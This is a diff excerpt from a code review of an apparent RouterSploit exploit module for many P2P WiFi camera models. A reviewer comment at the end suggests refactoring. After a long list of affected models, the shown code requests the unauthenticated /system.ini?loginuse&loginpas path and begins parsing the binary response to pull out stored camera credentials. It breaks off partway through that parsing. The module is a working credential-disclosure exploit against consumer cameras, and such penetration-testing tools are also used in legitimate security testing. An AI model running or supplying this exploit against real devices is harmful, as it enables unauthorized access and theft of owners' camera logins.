routersploit/modules/exploits/cameras/multi/P2P_wificam_credential_disclosure.py

```diff
@@ -0,0 +1,1345 @@
+            'boh l',
+            'bravo Other',
+            'bush+plus BU-300WF',
+            'ccam p2p',
+            'china 8904W',
+            'china HDIPCAM',
+            'china IPCAM',
+            'china Other',
+            'china PTZCAM',
+            'china np-02',
+            'ciana+exports antani',
+            'cina Other',
+            'coolead L',
+            'coolead L610WS',
+            'dax Other',
+            'denver IPC-320',
+            'denver IPO-320',
+            'e-landing 720p',
+            'eScam QF100',
+            'ebw Other',
+            'epexis PIPCAMHD82',
+            'epexis pipcam5',
+            'esecure nvp',
+            'geeya C602',
+            'geeya P2P',
+            'geeya c801',
+            'hdcam Other',
+            'homeguard 720P',
+            'homeguard Other',
+            'homeguard Wireless',
+            'homeguard wifi',
+            'iView ID002A',
+            'iView Other',
+            'insteon 75790',
+            'insteon 75790wh',
+            'insteon High',
+            'insteon Other',
+            'insteon Wireless',
+            'iuk 5A1',
+            'ivision hdwificam',
+            'iwitness bullet',
+            'jwt Other',
+            'jyacam JYA8010',
+            'kadymay KDM-6800',
+            'kadymay KDM6702',
+            'kadymay KMD-6800',
+            'kadymay Other',
+            'kang+xun xxc5030-t',
+            'kines Other',
+            'kiocong 1601',
+            'kiocong 1602',
+            'kiocong 1609',
+            'kiocong Other',
+            'kodak 201pl',
+            'koicong 1601',
+            'l+series CAM0758',
+            'l+series CAM0760',
+            'l+series Other',
+            'l+series V100',
+            'logan n8504hh',
+            'meyetech 095475-caeca',
+            'meyetech 188091-EFBAE',
+            'meyetech Other',
+            'meyetech WirelessCam',
+            'micasaverde VistaCamSD',
+            'pipcam HD17',
+            'pni 941w',
+            'pni IP451W',
+            'pni IP541W',
+            'pni IP941W',
+            'pni IP951W',
+            'pni Other',
+            'pnp IP',
+            'pnp Other',
+            'semac Other',
+            'skylink WC-300PS',
+            'storex D-10H',
+        ],
+    }
+
+    target = exploits.Option(
+        '', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+
+    def run(self):
+        if self.check():
+            url = sanitize_url("{}:{}/system.ini?loginuse&loginpas".format(self.target, self.port))
+            response = requests.get(url)
+            print_info("Exploit succeeded, extracting credentials...")
+
+            # May the lord forgive me for writing such spaghetti
+            # Find the magic sequence "0000 0a0a 0a0a 01"
+            magic_sequence_location = response.content.find(b'\x00\x00\x0a\x0a\x0a\x0a\x01')
```

Comment:
You should extract "password extraction process" in a specific file/module as it seems to be exactly the same process as for the next file you commited. So you can simply call you method in both files.